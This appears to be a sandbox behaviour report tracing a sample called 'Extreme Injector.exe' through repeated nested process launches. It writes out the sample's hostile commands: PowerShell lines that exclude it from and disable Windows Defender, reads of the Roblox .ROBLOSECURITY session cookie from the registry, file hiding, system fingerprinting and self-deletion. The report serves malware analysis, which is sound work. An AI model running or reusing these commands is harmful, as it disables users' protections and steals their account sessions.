        Suspicious behavior: EnumeratesProcesses
        
        PID:2176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:2756
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:568
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        42⤵
        Executes dropped EXE
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        41⤵
        Executes dropped EXE
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        40⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2896
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        41⤵
        Views/modifies file attributes
        
        PID:2148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        41⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:2456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:2916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:1540
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2184
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        39⤵
        Executes dropped EXE
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        38⤵
        Executes dropped EXE
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        37⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2544
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        38⤵
        Views/modifies file attributes
        
        PID:1192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        38⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:2592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:2924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:2668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3048
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        36⤵
        Executes dropped EXE
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        35⤵
        Executes dropped EXE
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        34⤵
        Executes dropped EXE
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        33⤵
        Executes dropped EXE
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        32⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2972
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        33⤵
        Views/modifies file attributes
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:1856
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:2296
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2512
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        31⤵
        Executes dropped EXE
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        30⤵
        Executes dropped EXE
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        29⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:768
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        30⤵
        Views/modifies file attributes
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        30⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:2324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:2740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2320
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        28⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        27⤵
        Executes dropped EXE
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        26⤵
        Executes dropped EXE
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        25⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2576
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        26⤵
        Views/modifies file attributes
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:1804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:1724
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:2112
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2600
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        24⤵
        Executes dropped EXE
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        23⤵
        Executes dropped EXE
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        22⤵
        Executes dropped EXE
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2596
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        22⤵
        Views/modifies file attributes
        
        PID:2772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        22⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:1536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:1764
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:344
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2816
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        20⤵
        Executes dropped EXE
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        19⤵
        Executes dropped EXE
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        18⤵
        Executes dropped EXE
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2448
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        18⤵
        Views/modifies file attributes
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:3028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:2088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:2380
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2624
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        16⤵
        Executes dropped EXE
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        15⤵
        Executes dropped EXE
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2824
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:1648
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2888
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        13⤵
        Executes dropped EXE
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        12⤵
        Executes dropped EXE
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        11⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
